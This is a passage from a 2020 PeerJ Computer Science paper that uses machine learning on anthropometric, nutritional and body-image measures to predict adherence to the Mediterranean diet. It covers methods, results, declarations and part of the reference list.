All measurements were made during the same session, to avoid variations in the environmental or biological conditions. For the measurement of weight and size, the person was barefoot and with light clothing; an MB-201T plus Asimed scale-rod was used with an accuracy of 100 grams (weight) and 1 mm (size). BMI was obtained by means of the BMIratio ¼ weightðkgÞheightðm2Þ, and grouped according to the WHO classification of BMI , 18:5 kgm2 : low weight; 18.5–24.99 kg m2: normal weight; 25–29.99 kg m2: overweight, and � 30 kgm2: obesity. The waist and hip circumference was measured with an inelastic tape measure with the patient standing upright, the abdomen relaxed, the upper limbs hanging at the sides, and with the feet and knees joined together. The waist circumference was measured by taking the mid-point between the lower costal margins and the iliac crests, as it is considered a risk factor for CVD when it is wider than 80 cm in women and wider than 94 cm in men, and a very high risk if it exceeds 88 cms and 102 cms, respectively (Alberti et al., 2009). The hip circumference was measured as the maximum circumference around the buttocks. Based on these two values, the waist-hip ratio was calculated using the cut-off points proposed by the WHO, where normal levels of 0.8 are found in women and one in men, higher values indicating abdominal visceral obesity, which is associated with increased cardiovascular risk (Jover, 1997). The calf circumference was measured in the widest section of the ankle-knee distance (cuff area) showing a good correlation with fat-free mass and muscle strength (Rolland et al., 2003; Barbosa Murillo et al., 2007; Bonnefoy et al., 2002). The measurement was carried out with an inextensible tape measure in cm. Subscapular skin fold, this fold measures truncal obesity. The measurement is made one centimetre below the lower angle of the scapula, following the natural furrow of the skin. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 5/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ The scapula protrudes when the arm is carefully placed behind the back and the lower angle can be located this way. The measurement of the fold will be diagonally over an angle of 45° to ensure the correct thickness measurement. The plicometer forceps should be applied 1 cm in the inferolateral position to the thumb and finger that lifts the fold. To assess the amount of subcutaneous adipose tissue, the skin folds were measured in millimetres in the tricipital, bicipital, subscapular and suprailiac areas. A digital calliper Trim metre was used, including a double layer of skin and underlying adipose tissue, always avoiding the muscle. The tricipital skinfold was measured longitudinally, at the back of the non-dominant upper limb, at the midpoint between acromion and olecranon, with the limb relaxed, parallel to the axis of the arm; the bicipital fold was measured at the same point as the tricipital, but on the under arm. The circumference of the arm was measured with an inextensible anthropometric tape measure in cm. The measurement was taken at the midpoint of the non-dominant arm, in the same place where the tricipital skinfold was measured and without compression with the anthropometric tape. Once the data of the different measurements were obtained, the mid-arm muscle circumference was found, with which the skeletal muscle mass of the patients (protein compartment) was known and expressed in cm. The arm muscle area indicated that the muscle compartment was based on the brachial circumference and tricipital skinfold measurements. The fat area of the arm indicated that the patient’s fatty compartment used the total brachial area and the muscular area of the arm. The Adipose Muscular Index, which evaluates the nutritional status from the adipose and muscular areas of the arm, was also calculated, being essentially applied in the assessment of obesity. For the determination of body fat percentage by electrical bio-impedance, a Beurer and BG55 model bio-impedance metre was used, with a maximum capacity of 150 kg and a precision of 0.1% for body fat, body water and muscle percentage, and 100 g for body weight, according to the information provided by the manufacturer. These methods are based on physical principles, such as the different ability of conduction or resistance that the tissues show to the passage of an electric current, with greater conductivity of the lean tissues than the fatty ones (Norman et al., 2007). Thus, by means of bio-impedance, the following values were obtained: weight, fat mass, liquid mass, muscle mass, bone density, basal metabolic rate (BMR) and activity metabolism. Data on socio-demographic variables, such as age, gender (male/female), cohabitation (with whom the live), prevalence of current smokers, ex smokers (patient stopped smoking more than 12 months before entering the study) and non-smokers were estimated. Additionally, blood pressure was recorded. Adherence to the MD Consumption of a characteristic food pattern of MD is associated with numerous health benefits. These benefits are attributed to bioactive compounds that exert synergistic effects and decrease the risk for development of chronic diseases. In order to assess the quality of dietary habits (adherence to a Mediterranean dietary pattern), the MD adherence test was used (Estruch et al., 2018). It is a questionnaire Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 6/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ consisting of fourteen quick questions that allow us to understand whether participants’ usual diet can be considered as following the parameters of the MD. Each question answered affirmatively adds a point. It is considered that a person correctly follows the MD when their score is equal to or greater than nine points. The assessment of nutritional status was determined using the Mini Nutritional Assessment (MNA) questionnaire (Estruch et al., 2018). It is a validated method which, through eighteen short questions, evaluates anthropometric measures, dietary habits, lifestyle, pharmacological treatments and mobility, and performs a subjective evaluation of health and nutritional status. The total value of the MNA scale is thirty points, a score <17 being considered malnutrition, there is a risk of malnutrition between 17 and 23, 5, and well nourished subjects obtain scores of 24 points and higher. A measure of subjective weight is included by asking: ‘I consider that my weight is: (A) higher than normal, (B) normal, (C) lower than normal’, following the model proposed in (Espina et al., 2001). Based on the answer, the population is classified into three groups: ‘fairly subjective weight’ those who believe to be at an ideal weight, ‘more subjective kilograms’ for those who believe that they are overweight and ‘less subjective kilograms’ for those who think they weigh less than they should. Two of the eleven sub-scales of Garner’s Eating Disorder Inventory (EDI-2) (Garner, 1998) were used to study body image: Body Dissatisfaction (EDI-IC) and Obsession for Thinness (EDI-OD), as they evaluate aspects directly related to perceptual alterations. The body dissatisfaction sub-scale (EDI-CI) measures the dissatisfaction of the subject with the general shape of their body or with those parts of the body that most concern those with eating disorders (stomach, hips, thighs, buttocks). The thinness obsession sub-scale (EDI-O) measures concern about weight, diets and fear of getting fat. This questionnaire was validated in Spain by (Corral et al., 1998). The fourteen items of these two sub-scales were mixed in the questionnaire to avoid the subjects guessing the construct being evaluated. All items were answered and corrected according to the form proposed in the questionnaire manual. The MD Adherence test was used to determine the degree of adherence to the MD, being a short specific questionnaire of fourteen items validated for the Spanish population and used by the MD Prevention Group (PREDIMED) (Martínez-González et al., 2015). Machine learning and statistical analysis The authors tested different ML techniques for solving this problem, using cross-validation techniques to avoid over-training, while ensuring that the generalised capability of the model is the best possible, as well as different runs of the experiments to check the behaviour of the techniques. Thus, all experiments were repeated ten times to check the stability of the results and the observed deviation between the experiments was small, as shown in the results section. In particular, a tenfold cross validation was used to divide the dataset in such a way that nine random partitions were used to train and one to validate the results, each time taking a different subset for validation. In order to compare the performance of the ML techniques, the Area Under the Receiver Operating Characteristic Curve (AUROC) was used. This is a combined Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 7/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ measurement which, besides being independent of the threshold used, includes both Type I and type II errors, ensuring that it is not conditioned by differences in the total number of cases of each class (Fawcett, 2006). An experimental design was employed (Fernandez-Lozano et al., 2016a), allowing us to divide the data using a cross-validation technique which ensured that the performance results obtained, as mentioned above, were not skewed. That is they were adjusted to the data, and researchers are able to identify which of the hyper-parameters are most suitable to find the best model with each ML techniques, according to its particular hyper-parameter configuration. To this end, the programming environment R (R Core Team, 2016) and the package mlr (Bischl et al., 2016) were used, which also allowed us to perform the considered experimental design. In addition, another of the objectives pursued by this study was to find as few variables as possible that would yield a performance value as high as possible, preferably at least equal to that obtained using all available variables. This is basically a feature selection approach where the main aims are the following: avoid overfitting and improve model performance, to provide faster and more cost-effective models, and moreover to gain a deeper insight into the underlying processes that generated the data as mentioned in (Saeys, Inza & Larrañaga, 2007). There are three approaches in ML to perform this process and the use of a filter approximation was chosen, for its velocity and independence of the classifier (Saeys, Inza & Larrañaga, 2007). In general, performing this feature selection process helps to reduce inherently the present noise in such datasets. The final step of our experimental analysis was a null hypothesis test for choosing the best model in order to ensure whether the performance of a particular ML technique is statistically better than the others or not. In our case, as there were more than two repeated measures, an ANOVA or a Friedman test should be considered. In particular, three different conditions should be checked: normality, independence and homoscedasticity. If our results fulfil the three conditions, a parametric test is applicable, and the ANOVA one should be considered, otherwise the non-parametric version, the Friedman test. Finally, a post hoc procedure had to be used in order to correct the p-values for multiple testing. Machine learning techniques for classification problems A large number of experiments were carried out in an attempt to identify the best ML model able to solve the problem and to ensure that the results are reproducible, real and obtained under equal conditions. In addition, the search space was explored for the best possible parameters for each technique in the same way, so that all techniques could have the same possibilities of exploration across the same subsets of data and avoid the over fit that could occur. In particular, the following well-known state-of-the-art techniques were implemented: Random Forest (RF) (Breiman, 2001), Support Vector Machines (SVM) (Cortes & Vapnik, 1995; Vapnik, 1995), Elastic Net (ENET) (Tibshirani, 1994; Zou & Hastie, 2005) and weighted k-Nearest Neighbours (KNNs) (Hechenbichler & Schliep, 2004). Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 8/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Random Forest (Breiman, 2001) is a state-of-the-art ML technique that was used in multiple domains with good results. One of its main strengths is that the results obtained are very easy to understand, it is based on very simple concepts and in general, although it is applied with little experience in the parametrisation of hyper-parameters, good results are obtained. This technique combines multiple decision trees, each of them tuned over a subset of bootstrapped data. In this way, RF combines each of the individual predictions of the decision trees into a global prediction that, in general, is more successful than any of the simple ones. Of all the possible variables in the dataset, a number were randomly selected (with replacement) and a number of trees were constructed based on the set of examples used for the training phase and obtained from the previously selected subset. When there are classification problems, it is recommended to use a square root number of the total number of variables existing in the dataset. To explore the solution space in the best way possible, in our experiments we used a parameter domain that was adjusted by a grid search and that, for a number of trees (1,000), we explored randomly selected values of variables (2–6). In addition, values that varied (1–4) according to the size of the terminal nodes of the tree were explored. Support Vector Machines (Cortes & Vapnik, 1995; Vapnik, 1995) is also one of the ML techniques that have been commonly used in different domains in recent years and have obtained good results. In fact, along with RF, it is one of the algorithms considered state-of-the-art, easy to understand, and the results obtained are verifiable. In problems that occur during a study, the main objective of SVM is to find the hyperplane that best separates the examples between high and low degree of adherence to the MD and at the same time to maximise the distance of separation between both examples and the hyperplane. That is it attempts to find the separation hyperplane that generalises in the best possible way (Burges, 1998). To achieve this goal, SVM introduces a particular mathematical concept known as kernel: it is a mathematical function that allows the conversion of the input space into a higher dimension, which is used to transform a non-separable linear problem into one that is separable. There are different kernel functions, which in general could be interpreted as a measure of similarity between two objects (60), and one of the most used is Gaussian Radial Basis (RBF), because basically any surface can be obtained with this function (61). In this case, the domain of the parameters used to search for the best model consists of a grid search of two different parameters. The first one (parameter C) is directly related to the model and is used as a balance between the classification errors and the simplicity of the decision surface, while the second (gamma parameter) is the free parameter of the Gaussian function and in particular, SVM is very sensitive to changes in this parameter. For both parameters, and according to the usual practice, values were evaluated in potencies of two between −12 and 12. To better understand this technique, the following reading materials are recommended (Burges, 1998; Vert, Tsuda & Schölkopf, 2004; Cristianini & Shawe-Taylor, 2000). Elastic Net (Tibshirani, 1994; Zou & Hastie, 2005) is based on lasso (penalised least squares method) and was specifically developed to solve some of the limitations encountered for this technique (56). On the one hand, a grid search was performed on two Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 9/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ different parameters, the alpha penalty parameter was searched (it has values in the range of 0–1) and in particular the following 0, 0.15, 0.25, 0.35, 0.5, 0.65, 0.75, 0.85 and 1. On the other hand, the best value of the lambda parameter was used, as recommended by the authors of the technique, from values less than or equal to one to negative powers of ten, in particular the following values were used: 0.0001, 0.001, 0.01, 0.1, 1. Finally, a simple KNN (Hechenbichler & Schliep, 2004) assigned, through a decision rule, an unclassified example belonging to a class by frequency of occurrence to its k-most similar neighbouring examples. Then, in accordance to the distance of Minkowski for each of the examples and following the maximum accumulated kernel densities the weighted KNN are identified (Hechenbichler & Schliep, 2004; Samworth, 2012). In particular, neighbouring values of less than or equal to nine were used. Therefore, this particular and improved implementation of a KNN used kernel functions to measure the degree of similarity of the examples, as previously mentioned in the case of the SVMs. RESULTS The dataset has a total of 38 variables employed to characterise the differences underlying in the data between high and low adherence to the MD. The data has been standardised using the z-score formula to have a mean equal to zero and a standard deviation equal to 1. Four different ML techniques were used to verify the results obtained, in an attempt to identify the technique that provides the best-performing results. Initially, the analysis of the complete set of study variables is carried out. It can be seen in Figs. 1A and 1B how the techniques present a fairly stable behaviour in the prediction. Even a simple a priori technique such as KNN obtains the best results of the entire experimental phase, indicating that almost all variables contain relevant information. In any case, in order to understand whether there is noise or contradictory or correlated information that may be hindering the learning process of the algorithms, a phase of dimensionality reduction will then be carried out. Additionally, a process of feature selection was carried out to reduce the number of variables as much as possible, so that the results could remain similar without statistical differences, if not better, for those obtained using all variables. Our approach is a filter feature selection using a T-test to quantify the correlation between each feature and the class (high or low adherence to the MD) before the training process. Three subsets of 4, 16 and 32 features were evaluated of the original ordering according to the highest p-value from the T-test. The average AUROC results of the execution of the ten 10-fold cross-validation experiments are shown in Fig. 1. As the number of features increases, there is a clear growing tendency in performance and obtained results in AUROC with 16 and 32 features are very close to those obtained with the full dataset. In any case, a study should be conducted on whether the differences are statistically significant between the subsets of 16, 32 variables and the full dataset to ensure that the subset with fewer features is statistically the best option. Finally, as shown in Fig. 1A, SVM is the best model in three out of the four datasets, and manages to reach values closest to 0.94 in AUROC. Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 10/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ However, as previously mentioned, a single mean measure is not enough and it is necessary to analyse the behaviour of the models during the whole experimental phase and to verify how stable they are, as shown in Fig. 1B. Figure 1B shows that if the number of variables is very small (4), the models are skewed and there is a higher variability in the performance because there is not enough information in the data to find a good classification model. It is also important to note that the results obtained with 16 and 32 features showed that this variability was significantly reduced until reaching average and standard deviation values very similar to those obtained using all the variables. As observed in the two previous figures, the best results in AUROC were obtained using SVM. The same results in accuracy are shown in Fig. 2. To check whether the difference between the three winning models (SVM with 16, 32 and all variables) is significant or not, a null hypothesis test was applied. Following the experimental methodology proposed in (Fernandez-Lozano et al., 2016a) for the normality FS−4 FS−16 FS−32 Full 0.6 0.7 0.8 0.9 D a ta se ts (a) 0.6 0.7 0.8 0.9 A U R O C (b) Machine Learning algorithms RF SVM GLMNET KNN FS−4 FS−16 FS−32 Full Figure 1 Summary of the performance (AUROC) of the four ML techniques (RF, SVM, GLMNET and KNN) for each one of the subsets of features. (A) Average of the experiments for each size analysed and (B) boxplot of the results in order to check the behaviour of the techniques through the learning process. Full-size DOI: 10.7717/peerj-cs.287/fig-1 Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 11/21 http://dx.doi.org/10.7717/peerj-cs.287/fig-1 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ condition we used the Shapiro–Wilk test (Shapiro & Wilk, 1965), with a confidence level a ¼ 0:05. with the null hipothesis that our results follow a normal distribution. The null hypothesis was not rejected with values W ¼ 0:96179 and p‐value ¼ 0:3438, therefore our results did follow a normal distribution. Next, a Bartlett test (Bartlett, 1937) was performed, with a confidence level a ¼ 0:05 and with the null hypothesis that our data were heterocedastic. The test result indicates that the null hypothesis should not be rejected with a value of Barlett’s K-squared 2:3128 with two degrees of freedom and p‐value ¼ 0:3146. The result of both tests indicates that a parametric ANOVA test should be conducted, with a confidence level a ¼ 0:05 assuming the null hypothesis that our results are statistically equal. The results of the ANOVA test indicates that we fail to reject the null hypothesis and the three ML models are statistically equal with an adjusted p‐value ¼ 0:1124. Consequently, a 16-feature model should be considered (BMR, MNA total score, weight, height, bone density, waist-hip ratio, smoker, age, EDI-OD, circumference of the arm, activity metabolism, subscapular skin fold, FS−4 FS−16 FS−32 Full 0.6 0.7 0.8 D a ta se ts Accuracy(a) FS−4 FS−16 FS−32 Full 0.5 0.6 0.7 0.8 F−Measure(b) Machine Learning algorithms RF SVM GLMNET KNN Figure 2 Summary of the average performance of the experiments: (A) (Accuracy) and (B) (F-measure) of the four ML techniques (RF, SVM, GLMNET and KNN) for each one of the subsets of features. Full-size DOI: 10.7717/peerj-cs.287/fig-2 Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 12/21 http://dx.doi.org/10.7717/peerj-cs.287/fig-2 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ subscapular circumference in cm, circumference of the waist, circumference of the calf, brachial area) as the best-performing one, and half of the initial features that are not relevant for the SVM were removed. DISCUSSION To check whether our results are relevant and are in accordance with what has been previously published, the state-of-the-art articles published on the topic were reviewed, in an attempt to identify the degree of adherence to the variables most related to a MD. The search results led to previous studies that also found the variables identified by SVM as the most important, in particular BMR (Cutillas et al., 2013; Careau, 2017; Srivastava et al., 2017; Bonfanti et al., 2014), MNA total score (Farias et al., 2016; Zaragoza Martí et al., 2015; Abreu-Reyes et al., 2017), weight and height (De la Montaña Miguélez et al., 2012; Buckland, Bach-faig & Majem, 2008; Ortega Anta & López Sobaler, 2014; Travé & Castroviejo, 2011), bone density (Romero Pérez & Rivas Velasco, 2014; Savanelli et al., 2017; Melaku et al., 2017; Štefan et al., 2017) or waist-hip ratio (Downer et al., 2016; Estruch et al., 2016; Bertoli et al., 2015) and if the patient is a smoker (Zaragoza Martí et al., 2015; Marventano et al., 2017, Grao-Cruces et al., 2015). Therefore, the results were contrasted, ensuring the ability of ML techniques to identify underlying patterns in the data. According to the feature selection process, the remaining predictors are not relevant for all the ML techniques. CONCLUSIONS The first model based on ML that was proposed for the prediction of the degree of adherence to the MD depended on information related to different anthropometric variables, socio-demographic variables, nutritional status and self-perception of body image. Initially, experiments with four different ML methods were performed and feature selection techniques were applied to reduce the dimensionality of the problem. SVM is the best-performing model according to the experimental design after a null hypothesis test, and our study found that using a feature selection approach, the number of features could be drastically reduced to 16 (less than half of the initial number) achieving an equivalent performance value in AUROC. The best model obtained was an SVM with an RBF kernel as a decision function. The importance of each one of the predictors cannot be studied because a nonlinear SVM is like a black box and the internal mapping function is unknown. Furthermore, the weight vector cannot be explicitly computed. Finally, our results are in accordance with the findings of previous publications and have primarily served to establish new factors related to the degree of adherence to the MD. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work is supported by the “Collaborative Project in Genomic Data Integration (CICLOGEN)” PI17/01826 funded by the Carlos III Health Institute from the Spanish National plan for Scientific and Technical Research and Innovation 2013–2016 and Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 13/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ the European Regional Development Funds (FEDER)—“A way to build Europe”. This project was also supported by the General Directorate of Culture, Education and University Management of Xunta de Galicia (Ref. ED431G/01, ED431D 2017/16), the “Galician Network for Colorectal Cancer Research” (Ref. ED431D 2017/23), Competitive Reference Groups (Ref. ED431C 2018/49) and the European Regional Development Funds (FEDER)—“A way to build Europe”. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Collaborative Project in Genomic Data Integration (CICLOGEN): PI17/01826. Carlos III Health Institute from the Spanish National plan for Scientific and Technical Research and Innovation 2013–2016. European Regional Development Funds (FEDER)—“A way to build Europe”. General Directorate of Culture, Education and University Management of Xunta de Galicia: ED431G/01 and ED431D 2017/16. Galician Network for Colorectal Cancer Research: ED431D 2017/23. Competitive Reference Groups: ED431C 2018/49. European Regional Development Funds (FEDER)—“A way to build Europe”. Competing Interests The authors declare that they have no competing interests. Author Contributions � Alba Arceo-Vilas performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Carlos Fernandez-Lozano conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � Salvador Pita conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. � Sonia Pértega-Díaz conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. � Alejandro Pazos conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e. approving body and any reference numbers): The study received written approval from the Regional Ethics Committee for Clinical Research (code 2012/390 CEIC Galicia). Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 14/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Data is available at Figshare: Fernandez-Lozano, Carlos (2019): Identification of predictive factors of the degree of adherence to the Mediterranean diet through machine-learning techniques. figshare. Dataset. DOI 10.6084/m9.figshare.7628837.v2. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.287#supplemental-information. REFERENCES Abreu-Reyes JA, Álvarez-Luis D, Arteaga-Hernández V, Sánchez-Mendez M, Abreu-González R. 2017. Mediterranean diet adherence by patients with primary open angle glaucoma. Archivos de la Sociedad Española de Oftalmología 92(8):353–358 DOI 10.1016/j.oftale.2017.02.006. Alberti KGMM, Eckel RH, Grundy SM, Zimmet PZ, Cleeman JI, Donato KA, Fruchart JC, James WPT, Loria CM, Smith SC. 2009. Harmonizing the metabolic syndrome: a joint interim statement of the international diabetes federation task force on epidemiology and prevention; national heart, lung, and blood institute; American heart association; world heart federation; international. Circulation 120(16):1640–1645. Anta RMO, Lopez-Solaber AM, Perez-Farinos N, Ortega Anta RM, López-Solaber AM, Pérez-Farinós N. 2013. Associated factors of obesity in Spanish representative samples. Nutricion Hospitalaria 28(5):56–62. Buckland G, Bach-Faig A, Majem LS. 2008. Eficacia de la dieta mediterránea en la prevención de la obesidad. Una revisión de la bibliografía. Revista Española de Obesidad 6(6):329–339. Barbosa Murillo JAP, Rodríguez M NG, Hernández H De Valera YM, Hernández H RA, Herrera M HA. 2007. Masa muscular, fuerza muscular y otros componentes de funcionalidad en adultos mayores institucionalizados de la Gran Caracas-Venezuela. Nutricion Hospitalaria 22(5):578–583. Bartlett MS. 1937. Properties of sufficiency and statistical tests. Proceedings of the Royal Society of London: Series A, Mathematical and Physical Sciences 160(901):268–282. Bertoli S, Leone A, Vignati L, Bedogni G, Martínez-González MÁ, Bes-Rastrollo M, Spadafranca A, Vanzulli A, Battezzati A. 2015. Adherence to the Mediterranean diet is inversely associated with visceral abdominal tissue in Caucasian subjects. Clinical Nutrition 34(6):1266–1272 DOI 10.1016/j.clnu.2015.10.003. Bischl B, Lang M, Kotthoff L, Schiffner J, Richter J, Studerus E, Casalicchio G, Jones Z. 2016. mlr: machine learning in R. Journal of Machine Learning Research 17(170):1–5. Bonfanti N, Fernandez JM, Gomez-Delgado F, Perez-Jimenez F. 2014. Effect of two hypocaloric diets and their combination with physical exercise on basal metabolic rate and body composition. Nutricion Hospitalaria 29(3):635–643. Bonnefoy M, Jauffret M, Kostka T, Jusot JF. 2002. Usefulness of calf circumference measurement in assessing the nutritional state of hospitalized elderly people. Gerontology 48(3):162–169 DOI 10.1159/000052836. Breiman L. 2001. Random forests. Machine Learning 45(1):5–32 DOI 10.1023/A:1010933404324. Bruno E, Manoukian S, Venturelli E, Oliverio A, Rovera F, Iula G, Morelli D, Peissel B, Azzolini J, Roveda E, Pasanisi P. 2017. Adherence to Mediterranean diet and metabolic Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 15/21 https://doi.org/10.6084/m9.figshare.7628837.v2 http://dx.doi.org/10.7717/peerj-cs.287#supplemental-information http://dx.doi.org/10.7717/peerj-cs.287#supplemental-information http://dx.doi.org/10.1016/j.oftale.2017.02.006 http://dx.doi.org/10.1016/j.clnu.2015.10.003 http://dx.doi.org/10.1159/000052836 http://dx.doi.org/10.1023/A:1010933404324 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ syndrome in BRCA mutation carriers. Integrative Cancer Therapies 17(1):153–160 DOI 10.1177/1534735417721015. Burges CJC. 1998. A tutorial on support vector machines for pattern recognition. Data Mining and Knowledge Discovery 2(2):121–167 DOI 10.1023/A:1009715923555. Careau V. 2017. Energy intake, basal metabolic rate, and within-individual trade-offs in men and women training for a half marathon: a reanalysis. Physiological and Biochemical Zoology 90(3):392–398 DOI 10.1086/691338. Chrysohoou C, Panagiotakos DB, Pitsavos C, Das UN, Stefanadis C. 2004. Adherence to the Mediterranean diet attenuates inflammation and coagulation process in healthy adults: the ATTICA study. Journal of the American College of Cardiology 44(1):152–158 DOI 10.1016/j.jacc.2004.03.039. Corral S, González M, Pereña J, Seisdedos N. 1998. Adaptación española del Inventario de trastornos de la conducta alimentaria. Madrid: TEA. Cortes C, Vapnik V. 1995. Support-vector networks. Machine Learning 20:273–297. Cristianini N, Shawe-Taylor J. 2000. An introduction to support vector machines: and other kernel- based learning methods. New York: Cambridge University Press. Cutillas AB, Herrero E, De San Eustaquio A, Zamora S, Pérez-Llamas F. 2013. Prevalencia de peso insuficiente, sobrepeso y obesidad, ingesta de energía y perfil calórico de la dieta de estudiantes universitarios de la comunidad autónoma de la región de Murcia (España). Nutricion Hospitalaria 28(3):683–689. De la Montaña Miguélez J, Cobas N, Rodríguez M, Míguez Bernárdez M, Castro Sobrino L. 2012. Adherencia a la dieta mediterranea y su relación con el índice de masa corporal en universiarios de Galicia. Nutrición Clínica y Dietética Hospitalaria 32(3):72–80. De Viñaspre OP, Oronoz M. 2015. SNOMED CT in a language isolate: an algorithm for a semiautomatic translation. BMC Medical Informatics and Decision Making 15(Suppl. 2):S5 DOI 10.1186/1472-6947-15-S2-S5. Della Camera PA, Morselli S, Cito G, Tasso G, Cocci A, Laruccia N, Travaglini F, Del Fabbro D, Mottola AR, Gacci M, Serni S, Carini M, Natali A. 2017. Sexual health, adherence to Mediterranean diet, body weight, physical activity and mental state: factors correlated to each other. Urologia Journal 84(4):221–225 DOI 10.5301/uj.5000255. Downer MK, Gea A, Stampfer M, Sánchez-Tainta A, Corella D, Salas-Salvadó J, Ros E, Estruch R, Fitó M, Gómez-Gracia E, Arós F, Fiol M, De-la Corte FJG, Serra-Majem L, Pinto X, Basora J, Sorlí JV, Vinyoles E, Zazpe I, Martínez-González M-Á. 2016. Predictors of short- and long-term adherence with a Mediterranean-type diet intervention: the PREDIMED randomized trial. International Journal of Behavioral Nutrition and Physical Activity 13(1):67 DOI 10.1186/s12966-016-0394-6. Dussaillant C, ECheverría G, inés UrquiaGa, niColás VelasCo and attilio RiGotti. 2016. Evidencia actual sobre los beneficios de la dieta mediterránea en salud. Artículo de Revisión Rev Med chileRev Med Chile 144(144):1044–1052. Díaz-Uriarte R, De Andrés SA. 2006. Gene selection and classification of microarray data using random forest. BMC Bioinformatics 7(1):3 DOI 10.1186/1471-2105-7-3. Espina A, Ortego MA, De Alda IO, Yenes F, Aleman A. 2001. La imagen corporal en los trastornos alimentarios. Body Shape in Eating Disorders 13(4):533–538. Estruch R, Martínez-González MA, Corella D, Salas-Salvadó J, Fitó M, Chiva-Blanch G, Fiol M, Gómez-Gracia E, Arós F, Lapetra J, Serra-Majem L, Pintó X, Buil-Cosiales P, Sorlí JV, Muñoz MA, Basora-Gallisá J, Lamuela-Raventós RM, Serra-Mir M, Ros E. 2016. Effect of a high-fat Mediterranean diet on bodyweight and waist circumference: a prespecified secondary Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 16/21 http://dx.doi.org/10.1177/1534735417721015 http://dx.doi.org/10.1023/A:1009715923555 http://dx.doi.org/10.1086/691338 http://dx.doi.org/10.1016/j.jacc.2004.03.039 http://dx.doi.org/10.1186/1472-6947-15-S2-S5 http://dx.doi.org/10.5301/uj.5000255 http://dx.doi.org/10.1186/s12966-016-0394-6 http://dx.doi.org/10.1186/1471-2105-7-3 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ outcomes analysis of the PREDIMED randomised controlled trial. Lancet Diabetes & Endocrinology 4(8):666–676 DOI 10.1016/S2213-8587(16)30085-7. Estruch R, Ros E, Salas-Salvadó J, Covas M-I, Corella D, Arós F, Gómez-Gracia E, Ruiz-Gutiérrez V, Fiol M, Lapetra J, Lamuela-Raventos RM, Serra-Majem L, Pintó X, Basora J, Muñoz MA, Sorlí JV, Martínez JA, Martínez-González MA. 2013. Primary prevention of cardiovascular disease with a Mediterranean diet. New England Journal of Medicine 368(14):130225030008006. Farias G, Thieme RD, Teixeira LM, Heyde ME, Bettini S, Radominski R. 2016. Nutrición Hospitalaria Trabajo Original. Nutricion Hospitalaria 33(5):1108–1115. Fawcett T. 2006. An introduction to ROC analysis. Pattern Recognition Letters 27(8):861–874 DOI 10.1016/j.patrec.2005.10.010. Fernandez-Lozano C, Gestal M, Munteanu CR, Dorado J, Pazos A. 2016a. A methodology for the design of experiments in computational intelligence with multiple regression models. PeerJ 4(4):e2721 DOI 10.7717/peerj.2721. Fernandez-Lozano C, Seoane J, Gestal M, Gaunt T, Dorado J, Pazos A, Campbell C. 2016b. Texture analysis in gel electrophoresis images using an integrative kernel-based approach. Scientific Reports 6(1):2064 DOI 10.1038/srep19256. Finucane M, Stevens G, Cowan M, Danaei G, Lin JK, Paciorek CJ, Singh GM, Gutierrez HR, Lu Y, Bahalim AN, Farzadfar F, Riley LM, Ezzati M. 2011. National, regional, and global trends in body-mass index since 1980: systematic analysis of health examination surveys and epidemiological studies with 960 country. Lancet 377(9765):557–567 DOI 10.1016/S0140-6736(10)62037-5. Garner D. 1998. EDI-2: Inventario de Trastornos de la Conducta Alimentaria: Manual. Madrid: TEA. Grao-Cruces A, Nuviala A, Fernandez-Martinez A, Martinez-Lopez E-J. 2015. Relationship of physical activity and sedentarism with tobacco and alcohol consumption, and Mediterranean diet in Spanish teenagers. Nutricion hospitalaria 31(4):1693–1700. Hechenbichler K, Schliep K. 2004. Weighted k-nearest-neighbor techniques and ordinal classification. Collaborative Research Center 386, Discussion Paper 399. DOI 10.5282/ubm/epub.1769. Hu Z, Mao J-H, Curtis C, Huang G, Gu S, Heiser L, Lenburg ME, Korkola JE, Bayani N, Samarajiwa S, Seoane JA, Dane MA, Esch A, Feiler HS, Wang NJ, Hardwicke MA, Laquerre S, Jackson J, Wood KW, Weber B, Spellman PT, Aparicio S, Wooster R, Caldas C, Gray 